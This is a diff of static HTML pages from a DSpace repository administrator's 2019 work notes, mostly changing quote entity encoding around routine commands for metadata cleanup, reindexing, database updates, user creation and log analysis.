$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Then I started a full Discovery re-indexing:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>I was going to make a new controlled vocabulary of the top 100 terms after these corrections, but I noticed a bunch of duplicates and variations when I sorted them alphabetically</li>
<li>Instead, I exported a new list and asked Peter to look at it again</li>
<li>Apply Peter&rsquo;s new corrections on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Then I re-exported the sponsors and took the top 100 to update the existing controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/423">#423</a>)
<ul>
@ -573,16 +573,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dsp
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t corrections -d
</code></pre><ul>
<li>Then start a full Discovery re-indexing on each server:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Export new list of all authors from CGSpace database to send to Peter:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
COPY 64871
</code></pre><ul>
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
@ -609,7 +609,7 @@ COPY 64871
</code></pre><ul>
<li>For now I just created an eperson with her personal email address until I have time to check LDAP to see what&rsquo;s up with her CGIAR account:</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p &#39;sknflksnfksnfdls&#39;
</code></pre><!-- raw HTML omitted -->
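<ul><li>The LDAP check, when I get to it, would be something like this (host, bind DN, and account name are placeholders, not our real values):</li></ul>
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://ldap.example.org -D 'cn=binduser,dc=example,dc=org' -W -b 'dc=example,dc=org' '(sAMAccountName=sakshi)'
</code></pre>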


@ -34,7 +34,7 @@ Run system updates on CGSpace (linode18) and reboot it
Skype with Marie-Angélique and Abenet about CG Core v2
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -203,7 +203,7 @@ $ csvcut -l -c 0 /tmp/countries.csv &gt; 2019-06-10-countries.csv
</code></pre><ul>
<li>Get a list of all the unique AGROVOC subject terms in IITA&rsquo;s data and export it to a text file so I can validate them with my <code>agrovoc-lookup.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
<pre tabindex="0"><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed &#39;s/||/\n/g&#39; | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
$ ./agrovoc-lookup.py -i iita-agrovoc.txt -om iita-agrovoc-matches.txt -or iita-agrovoc-rejects.txt
$ wc -l iita-agrovoc*
402 iita-agrovoc-matches.txt
@ -216,7 +216,7 @@ $ wc -l iita-agrovoc*
</code></pre><ul>
<li>Then make a new list to use with reconcile-csv by adding line numbers with csvcut and changing the line number header to <code>id</code>:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' &gt; 2019-06-10-subjects-matched.csv
<pre tabindex="0"><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed &#39;s/line_number/id/&#39; &gt; 2019-06-10-subjects-matched.csv
</code></pre><h2 id="2019-06-20">2019-06-20</h2>
<ul>
<li>Share some feedback about AReS v2 with the colleagues and encourage them to do the same</li>
@ -238,11 +238,11 @@ $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGR
<ul>
<li>Normalize <code>text_lang</code> values for metadata on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE 1551
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE 2070
dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
UPDATE 2
</code></pre><ul>
<li>Upload 202 IITA records from earlier this month (20194th.xls) to CGSpace</li>
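<li>The upload itself was likely a CSV metadata import along these lines (path and eperson hypothetical):</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-import -f /tmp/20194th.csv -e aorth@cgiar.org
</code></pre>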


@ -38,7 +38,7 @@ CGSpace
Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -153,13 +153,13 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
</ul>
</li>
</ul>
<pre tabindex="0"><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
<pre tabindex="0"><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>
<li>I restarted Tomcat <em>ten times</em> and it never worked&hellip;</li>
<li>I tried to stop Tomcat and delete the write locks:</li>
</ul>
<pre tabindex="0"><code># systemctl stop tomcat7
# find /dspace/solr/statistics* -iname &quot;*.lock&quot; -print -delete
# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
/dspace/solr/statistics/data/index/write.lock
/dspace/solr/statistics-2010/data/index/write.lock
/dspace/solr/statistics-2011/data/index/write.lock
@ -170,7 +170,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
/dspace/solr/statistics-2016/data/index/write.lock
/dspace/solr/statistics-2017/data/index/write.lock
/dspace/solr/statistics-2018/data/index/write.lock
# find /dspace/solr/statistics* -iname &quot;*.lock&quot; -print -delete
# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
# systemctl start tomcat7
</code></pre><ul>
<li>But it still didn&rsquo;t work!</li>
@ -221,8 +221,8 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
$ echo &quot;10568/101992&quot; &gt;&gt; item_*/collections
<pre tabindex="0"><code>$ sed -i &#39;s/CC-BY 4.0/CC-BY-4.0/&#39; item_*/dublin_core.xml
$ echo &#34;10568/101992&#34; &gt;&gt; item_*/collections
$ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair_mapped
</code></pre><ul>
<li>I noticed that all twenty-seven items had double dates like &ldquo;2019-05||2019-05&rdquo; so I fixed those, but the rest of the metadata looked good so I unmapped them from the temporary collection</li>
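<li>One way to fix such doubled values in bulk, reusing the field-registry subselect pattern from the queries in these notes (an untested sketch):</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '\|\|.*$', '') WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'date' AND qualifier = 'issued') AND resource_type_id = 2 AND text_value LIKE '%||%';
</code></pre>
<ul>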
@ -249,20 +249,20 @@ $ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
$ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names.txt -d
</code></pre><ul>
<li>Send and merge a pull request for the new ORCID identifiers (<a href="https://github.com/ilri/DSpace/pull/428">#428</a>)</li>
<li>I created a CSV with some ORCID identifiers that I had seen change so I could update any existing ones in the database:</li>
</ul>
<pre tabindex="0"><code>cg.creator.id,correct
&quot;Marius Ekué: 0000-0002-5829-6321&quot;,&quot;Marius R.M. Ekué: 0000-0002-5829-6321&quot;
&quot;Mwungu: 0000-0001-6181-8445&quot;,&quot;Chris Miyinzi Mwungu: 0000-0001-6181-8445&quot;
&quot;Mwungu: 0000-0003-1658-287X&quot;,&quot;Chris Miyinzi Mwungu: 0000-0003-1658-287X&quot;
&#34;Marius Ekué: 0000-0002-5829-6321&#34;,&#34;Marius R.M. Ekué: 0000-0002-5829-6321&#34;
&#34;Mwungu: 0000-0001-6181-8445&#34;,&#34;Chris Miyinzi Mwungu: 0000-0001-6181-8445&#34;
&#34;Mwungu: 0000-0003-1658-287X&#34;,&#34;Chris Miyinzi Mwungu: 0000-0003-1658-287X&#34;
</code></pre><ul>
<li>But when I ran <code>fix-metadata-values.py</code> I didn&rsquo;t see any changes:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
</code></pre><h2 id="2019-07-06">2019-07-06</h2>
<ul>
<li>Send a reminder to Marie about my notes on the <a href="https://github.com/AgriculturalSemantics/cg-core/issues/2">CG Core v2 issue I created two weeks ago</a></li>
@ -282,22 +282,22 @@ $ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names
</li>
<li>Playing with the idea of using <a href="https://github.com/BurntSushi/xsv">xsv</a> to do some basic batch quality checks on CSVs, for example to find items that might be duplicates if they have the same DOI or title:</li>
</ul>
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
field,value,count
cg.identifier.doi,https://doi.org/10.1016/j.agwat.2018.06.018,2
$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
field,value,count
dc.title,Reference evapotranspiration prediction using hybridized fuzzy model with firefly algorithm: Regional case study in Burkina Faso,2
</code></pre><ul>
<li>Or perhaps if DOIs are valid or not (having doi.org in the URL):</li>
</ul>
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;doi.org&#39;
field,value,count
cg.identifier.doi,https://hdl.handle.net/10520/EJC-1236ac700f,1
</code></pre><ul>
<li>Or perhaps items with invalid ISSNs (according to the <a href="https://en.wikipedia.org/wiki/International_Standard_Serial_Number#Code_format">ISSN code format</a>):</li>
</ul>
<pre tabindex="0"><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '&quot;' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
<pre tabindex="0"><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v &#39;&#34;&#39; | grep -v -E &#39;^[0-9]{4}-[0-9]{3}[0-9xX]$&#39;
dc.identifier.issn
978-3-319-71997-9
978-3-319-71997-9
@ -350,13 +350,13 @@ dc.identifier.issn
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
<li>Tried to run <code>dspace cleanup -v</code> on CGSpace and ran into an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(167394) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(167394) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);&#39;
UPDATE 1
</code></pre><h2 id="2019-07-16">2019-07-16</h2>
<ul>
@ -371,9 +371,9 @@ $ sudo rm -rf ~/.local/share/containers
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-07-16.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>Start working on implementing the <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">CG Core v2 changes</a> on my local DSpace test environment</li>
@ -414,7 +414,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>Create an account for Lionelle Samnick on CGSpace because the registration isn&rsquo;t working for some reason:</li>
</ul>
<pre tabindex="0"><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
<pre tabindex="0"><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password &#39;blah&#39;
</code></pre><ul>
<li>I added her as a submitter to <a href="https://cgspace.cgiar.org/handle/10568/74536">CTA ISF Pro-Agro series</a></li>
<li>Start looking at 1429 records for the Bioversity batch import
@ -484,18 +484,18 @@ Please see the DSpace documentation for assistance.
<p>I might be able to use <a href="https://pypi.org/project/isbnlib/">isbnlib</a> to validate ISBNs in Python:</p>
</li>
</ul>
<pre tabindex="0"><code>if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
print(&quot;Yes&quot;)
<pre tabindex="0"><code>if isbnlib.is_isbn10(&#39;9966-955-07-0&#39;) or isbnlib.is_isbn13(&#39;9966-955-07-0&#39;):
print(&#34;Yes&#34;)
else:
print(&quot;No&quot;)
print(&#34;No&#34;)
</code></pre><ul>
<li>Or with <a href="https://github.com/arthurdejong/python-stdnum">python-stdnum</a>:</li>
</ul>
<pre tabindex="0"><code>from stdnum import isbn
from stdnum import issn
isbn.validate('978-92-9043-389-7')
issn.validate('1020-3362')
isbn.validate(&#39;978-92-9043-389-7&#39;)
issn.validate(&#39;1020-3362&#39;)
</code></pre><h2 id="2019-07-26">2019-07-26</h2>
<ul>
<li>
@ -510,7 +510,7 @@ issn.validate('1020-3362')
<p>I figured out a GREL to trim spaces in multi-value cells without splitting them:</p>
</li>
</ul>
<pre tabindex="0"><code>value.replace(/\s+\|\|/,&quot;||&quot;).replace(/\|\|\s+/,&quot;||&quot;)
<pre tabindex="0"><code>value.replace(/\s+\|\|/,&#34;||&#34;).replace(/\|\|\s+/,&#34;||&#34;)
</code></pre><ul>
<li>I whipped up a quick script using Python Pandas to do whitespace cleanup</li>
</ul>
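<ul><li>It was roughly this shape, a minimal pandas sketch rather than the actual script (paths hypothetical):</li></ul>
<pre tabindex="0"><code>import pandas as pd

df = pd.read_csv('/tmp/input.csv', dtype=str)
for column in df.columns:
    # strip leading/trailing whitespace and collapse internal runs of whitespace
    df[column] = df[column].str.strip().str.replace(r'\s+', ' ', regex=True)
df.to_csv('/tmp/output.csv', index=False)
</code></pre>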


@ -46,7 +46,7 @@ After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s luck
Run system updates on DSpace Test (linode19) and reboot it
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -235,7 +235,7 @@ Run system updates on DSpace Test (linode19) and reboot it
</ul>
</li>
</ul>
<pre tabindex="0"><code># /opt/certbot-auto renew --standalone --pre-hook &quot;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&quot; --post-hook &quot;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&quot;
<pre tabindex="0"><code># /opt/certbot-auto renew --standalone --pre-hook &#34;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&#34; --post-hook &#34;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&#34;
</code></pre><ul>
<li>It is important that the firewall starts back up before the Docker container or else Docker will complain about missing iptables chains</li>
<li>Also, I updated to the latest TLS Intermediate settings as appropriate for Ubuntu 18.04&rsquo;s <a href="https://ssl-config.mozilla.org/#server=nginx&amp;server-version=1.16.0&amp;config=intermediate&amp;openssl-version=1.1.0g&amp;hsts=false&amp;ocsp=false">OpenSSL 1.1.0g with nginx 1.16.0</a></li>
@ -243,9 +243,9 @@ Run system updates on DSpace Test (linode19) and reboot it
<li>Get a list of all PDFs from the Bioversity migration that fail to download and save them so I can try again with a different path in the URL:</li>
</ul>
<pre tabindex="0"><code>$ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
$ grep -B1 &quot;Download failed&quot; /tmp/2019-08-08-download-pdfs.txt | grep &quot;Downloading&quot; | sed -e 's/&gt; Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
$ ./generate-thumbnails.py -i /tmp/user-upload.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs2.txt
$ grep -B1 &quot;Download failed&quot; /tmp/2019-08-08-download-pdfs2.txt | grep &quot;Downloading&quot; | sed -e 's/&gt; Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs2.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
$ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs3.txt
</code></pre><ul>
<li>
@ -329,7 +329,7 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
<ul>
<li>Create a test user on DSpace Test for Mohammad Salem to attempt depositing:</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p &#39;domoamaaa&#39;
</code></pre><ul>
<li>Create and merge a pull request (<a href="https://github.com/ilri/DSpace/pull/429">#429</a>) to add eleven new CCAFS Phase II Project Tags to CGSpace</li>
<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">Solr cores issue</a> last week, but they could not reproduce the issue
@ -345,7 +345,7 @@ java.lang.OutOfMemoryError: GC overhead limit exceeded
</code></pre><ul>
<li>I increased the heap size to 1536m and tried again:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1536m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1536m&#34;
$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
</code></pre><ul>
<li>This time it succeeded, and using VisualVM I noticed that the import process used a maximum of 620MB of RAM</li>
@ -361,7 +361,7 @@ $ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
$ dspace metadata-import -f /tmp/bioversity1.csv -e blah@blah.com
$ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
</code></pre><ul>
@ -429,7 +429,7 @@ return os.path.basename(value)
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
</code></pre><ul>
<li>Apply the corrections on CGSpace and DSpace Test
<ul>
@ -478,7 +478,7 @@ sys 2m24.715s
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
COPY 65597
</code></pre><ul>
<li>Then I created a new CSV with two author columns (edit title of second column after):</li>
@ -492,7 +492,7 @@ COPY 65597
<li>This fixed a bunch of issues with spaces, commas, unnecessary Unicode characters, etc</li>
<li>Then I ran the corrections on my test server and there were 185 of them!</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correctauthor
</code></pre><ul>
<li>I very well might run these on CGSpace soon&hellip;</li>
</ul>
@ -506,7 +506,7 @@ COPY 65597
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &quot;*.xsl&quot; -exec ./cgcore-xsl-replacements.sed {} \;
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &#34;*.xsl&#34; -exec ./cgcore-xsl-replacements.sed {} \;
</code></pre><ul>
<li>I think I got everything in the XMLUI themes, but there may be some things I should check once I get a deployment up and running:
<ul>
@ -526,7 +526,7 @@ COPY 65597
</ul>
</li>
</ul>
<pre tabindex="0"><code>&quot;handles&quot;:[&quot;10986/30568&quot;,&quot;10568/97825&quot;],&quot;handle&quot;:&quot;10986/30568&quot;
<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10986/30568&#34;,&#34;10568/97825&#34;],&#34;handle&#34;:&#34;10986/30568&#34;
</code></pre><ul>
<li>So this is the same issue we had before, where Altmetric <em>knows</em> this Handle is associated with a DOI that has a score, but the client-side JavaScript code doesn&rsquo;t show it because it seems to be a secondary handle or something</li>
</ul>


@ -12,7 +12,7 @@
Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -23,7 +23,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -49,7 +49,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
